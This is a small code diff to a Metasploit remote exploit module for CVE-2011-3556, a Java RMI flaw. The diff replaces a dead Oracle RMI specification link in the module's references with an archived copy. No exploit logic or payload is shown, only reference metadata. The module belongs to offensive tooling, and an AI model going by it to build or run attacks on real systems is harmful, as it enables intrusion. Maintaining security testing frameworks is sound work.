@@ -31,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'References'     =>
         [
           # RMI protocol specification
-          [ 'URL', 'http://download.oracle.com/javase/1.3/docs/guide/rmi/spec/rmi-protocol.html'],
+          [ 'URL', 'http://web.archive.org/web/20110824060234/http://download.oracle.com:80/javase/1.3/docs/guide/rmi/spec/rmi-protocol.html'],
           [ 'URL', 'http://www.securitytracker.com/id?1026215'],
           [ 'CVE', '2011-3556']
         ],
